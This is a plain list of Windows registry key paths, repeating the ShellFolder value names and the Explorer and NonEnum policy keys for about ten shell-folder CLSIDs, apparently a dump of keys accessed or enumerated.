HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{450D8FBA-AD25-11D0-98A8-0800361B1103}
HKEY_CLASSES_ROOT\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
HKEY_CLASSES_ROOT\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{89D83576-6BD1-4C86-9454-BEB04E94C819}
HKEY_CLASSES_ROOT\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{9343812E-1C37-4A49-A12E-4B2D810D956B}
HKEY_CLASSES_ROOT\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}
HKEY_CLASSES_ROOT\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}
HKEY_CLASSES_ROOT\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}
HKEY_CLASSES_ROOT\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{E345F35F-9397-435C-8F95-4E922C26259E}
HKEY_CLASSES_ROOT\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\WantsFORDISPLAY
